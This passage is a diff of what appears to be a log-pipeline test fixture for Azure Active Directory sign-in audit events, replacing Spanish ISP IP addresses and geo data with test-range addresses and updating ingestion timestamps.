Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e2a15fc0-6892-41f5-a41c-e515231cbb0a\",\"InterSystemsId\":\"32e2f533-40fb-4783-8c66-d1bad7e1cc88\",\"IntraSystemId\":\"74ab94ce-8928-4aff-8fa2-a66ad6d41f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -1658,25 +1442,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1690,7 +1456,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -1740,7 +1506,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -1752,12 +1518,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051515900Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970138300Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:08\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"e11538ff-5fe1-4fdd-8c5d-219d85c47bb3\",\"InterSystemsId\":\"3c5d16f4-16a6-45f4-a53d-abb86e35005b\",\"IntraSystemId\":\"f67a1615-4606-4673-b6fb-68f716345800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -1796,25 +1562,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "213.97.47.133" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1828,7 +1576,7 @@ "ObjectId": "00000002-0000-0ff1-ce00-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Success", @@ -1878,7 +1626,7 @@ "asr" ], "ip": [ - "213.97.47.133" + "67.43.156.15" ] }, "organization": { 
@@ -1890,12 +1638,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "213.97.47.133", - "ip": "213.97.47.133" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051518800Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970142Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:27\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"e031670b-bb84-45ee-94ff-0e70a8cd1138\",\"InterSystemsId\":\"40077a75-7b58-4623-a64a-f1b7de70fa54\",\"IntraSystemId\":\"4d1bd763-9b0b-4d5a-bda9-5c7a0a0a6000\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -1934,22 +1682,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 16299, - "organization": { - "name": "XFERA Moviles S.A." - } - }, - "ip": "37.29.234.179" + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" 
@@ -1963,7 +1696,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Redirect", @@ -2013,7 +1746,7 @@ "asr" ], "ip": [ - "37.29.234.179" + "67.43.156.14" ] }, "organization": { 
@@ -2025,12 +1758,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "37.29.234.179", - "ip": "37.29.234.179" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-06-17T07:32:46.051521700Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970146600Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:54\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"d39944c4-6766-4a89-8d5a-c789175830ee\",\"InterSystemsId\":\"425503c9-ccbf-4674-8f1e-4d56510474fd\",\"IntraSystemId\":\"57ef1056-6ce2-424a-b241-ce3939d00900\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2069,25 +1802,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -2101,7 +1816,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Success", @@ -2151,7 +1866,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -2163,12 +1878,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:46.051524500Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970152300Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:12\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"6f2b7716-1acc-450d-ae13-afad7e02d07e\",\"InterSystemsId\":\"4409eeeb-0ca5-42dd-99d9-4a6b2fabfa4f\",\"IntraSystemId\":\"0c8fcffc-a810-4a85-b8e2-3a2fda925c00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -2207,25 +1922,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "79.159.10.151" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -2239,7 +1936,7 @@ "ObjectId": "Unknown", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ExtendedProperties": { "KeepMeSignedIn": "False", "ResultStatusDetail": "Redirect", @@ -2289,7 +1986,7 @@ "asr" ], "ip": [ - "79.159.10.151" + "67.43.156.13" ] }, "organization": { 
@@ -2301,12 +1998,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "79.159.10.151", - "ip": "79.159.10.151" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-17T07:32:46.051527400Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:42:12.970156200Z", + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"47f3c440-3fb7-4b5e-9c20-455470b289d2\",\"InterSystemsId\":\"4542ce7e-270b-435e-8f81-ee23ea74be75\",\"IntraSystemId\":\"9718abaa-220e-49c5-8c9b-588d32b8db00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", "kind": "event", @@ -2345,22 +2042,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "country_name": "Spain", - "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" - }, - "as": { - "number": 16299, - "organization": { - "name": "XFERA Moviles S.A." - } - }, - "ip": "37.29.234.179" + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" 
@@ -2374,7 +2056,7 @@ "ObjectId": "00000002-0000-0000-c000-000000000000", "ResultStatus": "Succeeded", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "37.29.234.179", + "ActorIpAddress": "67.43.156.14", "ExtendedProperties": { "KeepMeSignedIn": "True", "ResultStatusDetail": "Success", @@ -2424,7 +2106,7 @@ "asr" ], "ip": [ - "37.29.234.179" + "67.43.156.14" ] }, "organization": { 
@@ -2436,12 +2118,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "37.29.234.179", - "ip": "37.29.234.179" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "event": { - "ingested": "2021-06-17T07:32:46.051530200Z", - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"37.29.234.179\",\"ApplicationId\":\"80ccca67-54bd-44ab-8625-4b79c4dc7775\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"37.29.234.179\",\"CreationTime\":\"2020-02-08T14:38:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 